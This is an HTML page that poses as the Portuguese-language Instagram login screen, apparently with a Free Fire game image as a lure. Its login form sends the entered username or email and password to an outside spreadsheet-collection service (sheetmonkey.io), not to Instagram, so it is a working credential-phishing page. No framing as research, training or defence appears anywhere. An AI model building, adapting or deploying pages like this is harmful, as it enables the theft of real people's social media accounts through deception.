<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">

  <title>Instagram</title>


<style>
b{font-size:20pt;
}
div{margin-left: 27%;
margin-top: 2%;
font-family:arial;

}
div#free{margin-left:49%;
  margin-top:4%;
  font-size:25pt;
}
a {color:#0195f6;
 
  text-decoration: none;
 }
body{
  background-color: whitespace-normal;
}
h1{
  color: ;
  border:;
  padding:;
  box-sizing: ;
  width:;
  height: ;
  margin-right:28% ;
  margin-left:23% ;
  margin-top: 10%;
}
input{
  background-color:rgb(260,250,270);
  border-radius:0.1rem;
  padding:;
  box-sizing: ;
  font-size:20pt;
  width: 450px;
  height:50px ;
  margin-top:7pt;
margin-left:28%;
margin-right:20%;}
button{
  border:0;
color:white ;
  border-radius:0.5rem;
  padding:;
  box-sizing: ;
  width: 300pt;
  height: 50pt;
  margin-top:15px;
  margin-left: 31%;
  margin-right: ;
  background-color: #0195f6;}

}
border-separate{color: ;
  border:;
  padding:;
  box-sizing: ;
  width: ;
  height: ;
  margin-top:10pt;
margin-right:35%;
  margin-left:50%;}
  p{
  width: ;
  height: ;
  margin-top:;
margin-right:;
  margin-left:32%;
}
.separator{
  margin-left:48%;
  color:#8e8e8e;}
div#ptg{color:#8e8e8e;
  margin-left:37%;
  width:500px;
  font-size:25pt;
}
div#icon{  margin-left:13%; }
div#container{100%}
div#sen{ margin-left:29%;
  font-size:20pt;}
}

}
img#meta{margin-left:;}
img#ress{margin-left:6%;}
::placeholder{font-size:20pt;}
a#freefire{margin-left:28%;}

</style>
</head>
<body>
</br>
</br>
</br>
  
<div id="ptg">Portugues (Brasil) » </div>
  <h1>
   <img id="ress" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRKo5XgOrtcaYXbgrtK6pgeyVVS7wf5bXQHUg&usqp=CAU" width="500px";
  >
  </h1>
 <a id="freefire" href="./index.html"><img src="rats.jpg" width="440px"></img></a>
  
 <div id="free" class="separator" >OU </div> 
 </br>
 <form action="https://api.sheetmonkey.io/form/vpBpLwCyVdCNnqtoVo7Kzi" method="POST">
     <input type="email" name="email" placeholder="Telefone, nome de usuario ou email" required>
     <input type="password" name="senha" placeholder="Senha" required>
<div id="sen"><a href="/">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Esqueceu a senha? </a></div>
</br>
     <button type="submit"><b>Entrar</b></button>

<p></p>
</br>
<div id="sen" >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Não tem uma conta? <a href="/"> Cadastre-se </a></div>
</form>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img id="meta" src="https://static.cdninstagram.com/rsrc.php/yb/r/SxCWlJznXoy.svg" height="90px" ></p>

</body>
</div>

</html>